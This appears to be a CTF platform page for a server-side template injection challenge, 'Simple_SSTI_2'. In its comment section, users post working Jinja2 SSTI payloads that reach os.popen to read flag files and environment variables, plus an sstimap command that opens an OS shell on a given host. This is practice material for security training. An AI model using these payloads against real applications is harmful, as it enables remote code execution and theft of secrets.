Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16470
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
shu-jia 攻破了该题 1天前
avaclaire 攻破了该题 2天前
cha8e1 攻破了该题 3天前
yehlg 攻破了该题 4天前
edisonya 攻破了该题 5天前
finsh 攻破了该题 5天前
pangjinqi 攻破了该题 6天前
mmhhdm 攻破了该题 6天前
wujita01 攻破了该题 6天前
Hackerchen 攻破了该题 7天前
影人sha 攻破了该题 7天前
drameet 攻破了该题 7天前
Hoshisyy 攻破了该题 11天前
SuperFan 攻破了该题 11天前
ikunqq 攻破了该题 12天前
十里故清云 攻破了该题 13天前
0n1y 攻破了该题 14天前
bugku2026 攻破了该题 15天前
kr2yh 攻破了该题 15天前
评论
bugku2026 15天前
举报
先通过?flag={{self.__dict__}}发现拥有lipsum,再通过?flag={{lipsum.__globals__.os.popen("cat /app/flag").read()}}获取flag
r1ng_13 1月前
举报
焚靖直接秒,比上一个SSTI还简单
网恋秀牛子被录屏导致自卑 3月前
举报
/?flag={{(OvO.__eq__.__globals__.sys.modules.os.popen('cat flag')).read()}}
liutong27 7月前
举报
python3 sstimap.py -u http://117.72.52.127:12369/?flag=1 --os-shell
wywitkey 10月前
举报
前面说的都对,这道题在ssti里比较简单,推荐使用sstimap,可以一把梭,直接出os-shell
HK1ng 1年前
举报
详解:https://blog.csdn.net/m0_59527104/article/details/147013776
smtall 1年前
举报
flag={{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag').read() }}
hao7 1年前
举报
?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}
超爱西西鸭 1年前
举报
/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}
pettter 1年前
举报
?id={{config.__class__.__init__.__globals__['os'].popen('printenv').read()}}